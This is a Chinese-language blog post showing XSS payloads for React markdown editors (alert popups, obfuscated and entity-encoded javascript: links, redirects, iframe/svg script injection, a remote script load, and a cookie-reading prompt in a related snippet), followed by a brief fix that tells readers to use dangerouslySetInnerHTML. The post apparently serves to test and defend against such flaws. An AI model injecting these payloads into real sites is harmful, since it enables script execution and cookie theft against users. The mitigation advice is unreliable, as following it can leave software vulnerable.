react markdown输入xss代码到markdown输入框中会执行xss代码

Markdown XSS攻击案例与防御
已于 2024-08-12 11:49:52 修改
阅读量568 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: xss攻击 react+js 文章标签: 前端 react.js xss
于 2024-06-25 16:07:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665443/article/details/139961752

在这里插入图片描述

我用的是这个插件,但是不管是什么markdown插件,原理都是一样的,我就以这个为例子了哈!
大家可以点击下方链接中测试下面的xss代码。
https://harrychen0506.github.io/react-markdown-editor-lite/

使用以下xss代码输入到markdown输入框中会执行xss代码:
1、触发弹窗:
(1)<img src="x" onerror="alert(55555)">

(2)通过拼接法绕过形式:<img src="x" onerror="parent[`al`+`ert`](55555)">

2、生成可点击跳转的的样式,用户点击后发生跳转:
[XSS](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)

3、网页跳转,等同于任意url跳转:输入后进入该页面自动发生跳转
<script>window.location.href="https://www.baidu.com"</script>
<meta content="1;http://www.baidu.com/" http-equiv="refresh">

4、其它标签payload触发弹窗:
<img src="" onerror="alert(1)">
<iframe src=javascript:alert(1)>
<svg><x><script>alert(1)</x>

5、IMG标签XSS使用JavaScript命令
<IMG SRC=http://3w.org/XSS/xss.js/>

6、URL绕行
<A HREF="http://127.0.0.1/">XSS</A>

举例一个,运行出来就是下方这样的
在这里插入图片描述
现在就来说怎么解决哈:

第一步:将html设置为false

在这里插入图片描述

第二步:使用dangerouslySetInnerHTML

在这里插入图片描述

希望可以帮助到大家!

【安全漏洞】gomarkdown/markdown 项目的 XSS 漏洞产生与分析
HBohan的博客
08-24 684
前言 gomarkdown/markdown 是 Go 语言的一个流行模块,它旨在快速地将 Markdown 文档转化为 HTML 页面。而此次发现的漏洞,来源于作者在编写其语法树 Parser 的时候无意的一次 unescape。 漏洞复现 我们首先来看一段代码。 package main import ( "fmt" "github.com/gomarkdown/markdown" "html" ) func main() { var textToRender = "``
利用Markdown语法并通过Markdown和Telescope的扩展持久XSS(CVE-2014-5144)
知柯信安
01-02 349
利用Markdown语法 Markdown很不错。实际上,本文章本身是用Markdown编写的。对于链接,表格code blocks和列表之类的简单事物,我不需要使用冗长的不必要的HTML 。我也不需要费力地用文本做一些简单的事情,例如使单词加粗或斜体。在过去的几年中,Markdown获得了很多关注。现在,它已被Reddit,Github,StackOverflow等使用。此外,在新兴企业推出的新应用程序中,Markdown似乎越来越受欢迎。伴随着这一响应,多年来,大量的Markdown解析库已经发布。 看
test
lastbright的博客
01-25 150
[a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) ![a](javascript:prompt(document.cookie)) &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;javascript:prompt(document.cook
{!! !!}输出markdown编辑器输入的内容如何防止 XSS,知识体系一共包含哪些部分?底层原理是什么?
最新发布
长风破浪会有时的博客
08-10 535
/ 简单示例(生产环境请用 HTMLPurifier)// 移除危险属性⚠️strip_tags不够安全,建议使用专业库。措施说明✅ 使用基于 HTMLPurifier,最可靠✅ 使用commonmarkMarkdown 专用净化✅ 避免!$userInput!!永远不要直接输出用户内容✅ 使用 CSP防止脚本执行输入验证限制 Markdown 内容长度、格式✅ 区分信任等级管理员内容可放宽,用户内容严格净化模块组件作用1. 输入Markdown 编辑器。
SRC挖掘漏洞XSS
hackzkaq的博客
12-07 247
没看够~?欢迎关注!免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
xssMarkdown
weixin_45946673的博客
10-24 2199
xssMarkdown markdown是一种轻量级标记语言,通过简单语法,可以使文本具有一定格式,最常见于GitHub上readme文件,现这种语言已被广泛使用. Markdown语法中易于攻击的两种 图片 链接 1 markdown插入图片 1.1 markdown语法: ![alt 属性文本](图片地址) 使用实例: ![RUNOOB 图标](https://img-pre.ivsky.com/img/tupian/pre/202103/29/haimian-019.jpg) 格
Markdown-XSS-Payloads:XSS有效载荷,用于利用Markdown语法
05-28
5. **代码块中的XSS**:Markdown允许使用`````创建代码块,攻击者可能在代码块中嵌入JavaScript代码,如果解析器没有正确处理,代码可能会被执行。 **防范Markdown XSS攻击** 1. **过滤和转义**:对用户提交的...
react-markdown-github:渲染MarkdownReact组件类似于Github的格式
05-09
react-markdown-github 一个包装了React组件: 用锚链接链接所有标头。 根据文档的sourceUri将所有相对链接解析为绝对的Github URL。 例如/foo/bar.md变成 允许父组件覆盖已解析的url。 安装 npm install react-...
markdown-textarea-react:允许用户在textarea表单字段中编写markdown语法并预览结果
02-17
markdown-textarea-react Node Package ,该Node Package显示一个textarea表单输入,该输入接受markdown语法并将值转换为html 安装 npm i markdown-textarea-react 基本用途 import React , { useState } from ...
React Markdown预览器:GitHub样式Markdown在Web中的实时展示
运行命令`$ npm install @uiw/react-markdown-preview --save`将会把该组件添加到项目依赖中,并保存到`package.json`文件里。这允许开发者在他们的项目中方便地使用`MarkdownPreview`组件。 #### 5. 使用范例 ...
从零设计React-Markdown组件的实现方案
警警的博客
04-07 1722
`首先是解析器类`,`用正则表达式分割文本为Token,然后生成AST`。接着,编写一个`React组件,接收Markdown字符串`,`解析`成AST,`遍历`AST生成对应的React元素。`处理代码高亮需要引入第三方库`,但用户不允许用现成组件库,可能需要自己实现或使用`轻量级高亮库`。 1. 实现Markdown解析器,生成AST。 2. 设计AST节点类型和转换逻辑。 3. 遍历AST,渲染为React组件。 4. 处理安全性,过滤危险内容。 5. 提供自定义组件和插件扩展点。
解析markdown_利用Markdown语法并通过Markdown和Telescope的扩展持久XSS(CVE20145144)
weixin_36258720的博客
01-15 265
点击上方蓝字,关注我们利用Markdown语法Markdown很不错。实际上,本文章本身是用Markdown编写的。对于链接,表格code blocks和列表之类的简单事物,我不需要使用冗长的不必要的HTML 。我也不需要费力地用文本做一些简单的事情,例如使单词加粗或斜体。在过去的几年中,Markdown获得了很多关注。现在,它已被Reddit,Github,StackOverflow等...
渗透测试之XSS漏洞:记一次模拟注入攻击
遇事不决 可问春风
09-18 3585
XSS(cross-site script)跨站脚本攻击是一种web应用程序前端漏洞。攻击者将代码注入,用户在使用时由浏览器对漏洞代码进行解析,从而达到恶意攻击用户的特殊目的。
VUE常用的MARKDOWN插件MAVON-EDITOR,如何避免XSS攻击?
刘大辉的博客
01-26 959
Vue常用的markdown的插件有mavon-editor, 但是我们在安装的时候,往往会被告知该插件存在隐藏的XSS攻击危险。那么如何避免XSS攻击呢? 安装markdown: npm install mavon-editor --save 接下来介绍一款XSS防范插件XSS,可以在npm仓库直接下载。https://github.com/Kylelkh/js-xss 安装命令:npm install xss --save 在Vue页面引入xss import xss from 'xss' 测试
xss php 转义_Parsedown 解析 Markdown 过滤 XSS 时应如何处理 html 转义
weixin_34765773的博客
03-09 332
用 Parsedown 对 Markdown 进行解析的时候,遇到了一些 XSS 过滤方面的问题。发现 Parsedown 会对 代码 区域内的 html 代码进行转义,代码区域外的却不进行转义,如以下代码所示PHPalert('test')***/这样,这句还是被成功执行了既然如此,那我先自己给它转义一下PHP<script>alert('test')</script>*...
markdown反射型xss漏洞复现
weixin_30315905的博客
03-19 961
markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到HackMD在前端渲染Markdown时的XSS防御所引起我的兴趣,由于HackMD允许嵌入客制化的网页标签,为了防止XSS的问题势必得对HTML进行过滤,这里HackMD使用了一个XSS防御函示库- npm...
react为什么不怕XSS
yiguoxiaohai的博客
10-10 886
react为什么不怕XSS
一次对 Tui Editor XSS 的挖掘与分析
离别歌
08-06 670
TOAST Tui Editor是一款富文本Markdown编辑器,用于给HTML表单提供Markdown和富文本编写支持。最近我们在工作中需要使用到它,相比于其他一些Markdown编辑...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值